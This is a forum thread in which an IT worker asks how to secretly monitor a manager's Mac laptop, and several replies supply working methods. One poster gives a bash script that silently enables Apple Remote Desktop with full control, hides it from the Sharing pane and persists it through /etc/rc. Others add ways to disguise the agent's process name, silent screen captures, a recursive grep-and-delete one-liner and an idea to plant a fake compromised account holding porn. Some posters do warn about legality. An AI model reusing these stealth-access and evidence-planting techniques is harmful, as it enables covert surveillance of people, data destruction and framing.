Grey Question... Hidding Remote Desktop or SSH

[digitaljunkie]

OK we have someone at work whom is believed to be "messing" around i.e downloading, chatting and even possibly damaging the companies integrity, whilst in the office.

The problem is they are a Manager that uses that uses a full admin account on their laptop. Because sensitive information may be stored on managerial laptops we don't Remote Desktop or SSH these laptops, if there's an issue we physically sit at the machine.

I have been asked by a Director if I can report at any given point what applications that person has running or what they are doing.
The problem is this person is fairly computer literate and by turning Remote Desktop on and not showing when it is active isn't really inconspicuos enough to gather proof.

Does anyone have any suggestions?

[acme.mail.order]

SSH is completely transparent to the console user, but if he knows it's supposed to be turned off it's really obvious that it's been changed. I've never used ARD, but VNC server is invisible IF it's started from the terminal. I do this regularly at my office (the staff aren't evil, they just don't read instructions) . You can detect VNC from the Terminal easily.

There are several keyloggers and screen capture programs for OSX - start at VersionTracker. Some of them pop up a small window until you pay for them, but the shareware fees shouldn't bankrupt you. How well they hide is an issue. Is he likely to poke around in the background processes?

Intercepting the mail/net traffic too? Don't need anything on his laptop for that.

If I were in your place, I would make it look like his machine had been hacked by a 3rd party - e.g. a hidden account named "0vvn3D" containing either a Star Trek site or gay poяn - something that the observee would never suspect you of. Naturally keep the Directors in the loop.

[voldenuit]

The cleanest approach would be to listen to the traffic via the diagnostics port of the switch, that way you don't even have to touch the machine.

Also be extremely careful to get full cover for what you do (in writing, the whole thing has decent chances of ending up in court one way or the other) and if in doubt about the legality of what you're about to do, consult a lawyer.
The Eichmann defense (they told me to kill them) doesn't work.

Preferably all you do should not only be legal, but also covered by company policy. Finally note that you'd better be on the winning side of this story or you may be looking for a new job real soon...

You should at least consider the possibility that the guy who asked you is trying to frame the manager for stuff that might not be work-related and key loggers and other intrusive tricks can't tell private and company use apart, so this is a really tricky subject.

Perhaps suggest they hire a PI instead, that way you're out of the loop entirely.

[digitaljunkie]

Thanks for all the comments...

Quote: Originally Posted by voldenuit The cleanest approach would be to listen to the traffic via the diagnostics port of the switch,

This does interest me when you say switch do you refer to the router as our switch is a rackmounted netgear 10/100 switch.

The router is a draytek 2800. Which also acts as the DHCP server.

[acme.mail.order]

Quote: Originally Posted by voldenuit Perhaps suggest they hire a PI instead, that way you're out of the loop entirely.

But then he's also out of the brownie-points loop

The company lawyer is a good idea. And you said A Director? Singular? How many are there and are they all involved? If this is all legit then the Director shouldn't have any problems sitting down with you and the company lawyer. Record the meeting.

[voldenuit]

Quote: Originally Posted by acme.mail.order But then he's also out of the brownie-points loop

Hacking is fun, being involved in machivellian schemes takes folks who can handle it and people skilled to do both well are rare.
It's dangerous and may be ethically and legally very, very borderline if not beyond.
A company lawyer will also place the companies interest before those of digitaljunkie who should make sure to have a very precise understanding of the legal framework for doing this kind of stuff.

Quote: Originally Posted by digitaljunkie This does interest me when you say switch do you refer to the router as our switch is a rackmounted netgear 10/100 switch.

I'm reasonably familiar with networking terminology, so yes, the switch is your target here.

Most rack-mounted models are managed, read the documentation and you'll most probably find some very interesting features for your purpose.

Again, be really careful about politics and legality, it's you, not one of them who's gonna be sued, fired or both.

[fenrack]

the magic script

run with sudo

-----
#!/bin/bash

### start ARD with all privileges for all users
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent
### edit /etc/hostconfig so ARD isnt checked in the Sharing pref pane
### badly need some delay here in order for ARD to start correctly and ports 3283 and 5900 to be opened correctly; i have tried with many different values, over 15 seems to be working 100% of the time, made it 20 sec to be sure
sleep 20
sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2
mv /tmp/output2 /etc/hostconfig
### modifying /etc/rc so ARD is started in stealth mode at every boot
sed 's/exit 0//' < /etc/rc > /tmp/output1
echo "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent" >> /tmp/output1
echo "sleep 20" >> /tmp/output1
echo "/usr/bin/sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2" >> /tmp/output1
echo "/bin/mv /tmp/output2 /etc/hostconfig" >> /tmp/output1
echo "exit 0" >> /tmp/output1
mv /tmp/output1 /etc/rc

exit 0
------

*cough*
im not responsable for whatever you do with that, educationnal purpose.

[hayne]

Quote: Originally Posted by fenrack the magic script

You forgot to supply the complementary script for the other side:

Code:

#!/bin/sh
# hide what we are doing from snoopy admins
A=A;R=R;D=D;g=g;e=e;n=n;t=t;k=k;i=i;l=l;a=a
while :; do
    ps axww | grep [$A]$R$D$A$g$e$n$t
    if [ $? = 0 ]; then
        echo "$A$R$D$A$g$e$n$t is running"
        echo "About to $k$i$l$l $A$R$D$A$g$e$n$t"
        $k$i$l$l$a$l$l $A$R$D$A$g$e$n$t
    fi

    sleep 60
done

[fenrack]

hayne, let's p-lease not suppose our guy is a shell scripter



PS: Thx for brining the Light side anyway

[acme.mail.order]

Quote: Originally Posted by fenrack sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2 mv /tmp/output2 /etc/hostconfig

Small timesaver: (edits the file in place)

perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig

[acme.mail.order]

Maybe you want to add this to the process, but watch the timing as it will take a while to finish. Should only need to be one once, perhaps at reboot with a Console Message "Optimizing File System" to cover the scanning.

nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm

[hayne]

Quote: Originally Posted by acme.mail.order nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm

What's the point of that? It would only catch scripts where the scripter didn't use any obfuscation.

[acme.mail.order]

If the guy's smart enough to do that, then we can all go home. He'll notice any monitoring and will be covering his tracks.

[hayne]

Quote: Originally Posted by acme.mail.order If the guy's smart enough to do that, then we can all go home.

He/she doesn't have to be all that smart - e.g. he/she could just copy my script from above.

[fenrack]

Quote: Originally Posted by acme.mail.order Small timesaver: (edits the file in place) perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig

omg.. you cant believe how hard i tried to do this
im such a noob lol
thank you a thousand times

[acme.mail.order]

Quote: Originally Posted by hayne He/she doesn't have to be all that smart - e.g. he/she could just copy my script from above.

Which you recently changed

mv ARDAgent smbmount

<substitute any unix-sounding name that isn't being used. Real utilities that aren't used on that box, like `named`, will hide well.>

Then adjust references to ARDAgent to the new name in fenrack's script, /etc/hostconfig and Startup Items. With a small amount of work, you can bury it so deep only forensic analysis will find it. Or a port scanner.

If ARD doesn't like having it's process name changed, VNC Server doesn't care.

[acme.mail.order]

Just discovered this one - secret screen captures from the shell:

screencapture -mx filename.pdf

-m : main monitor; -x : no audio

about 80kb per capture, they would need to be copied off fairly regularly.

[fenrack]

Quote: Originally Posted by acme.mail.order Just discovered this one - secret screen captures from the shell: screencapture -mx filename.pdf -m : main monitor; -x : no audio about 80kb per capture, they would need to be copied off fairly regularly.

make that "screencapture -mx filename.png" for 10.4.x or it wont open (bad PDF header)

[digitaljunkie]

ok ill have a play with those thanks peeps.

I noticed a wireless network thats unprotected and it appears that the person appears to be using that for msn aswell.
Is there anyway to prevent their laptop from joining said specified network without actually locking it down?

[voldenuit]

Yes, but WLAN is even easier to tap than Ethernet, so why would you do that ?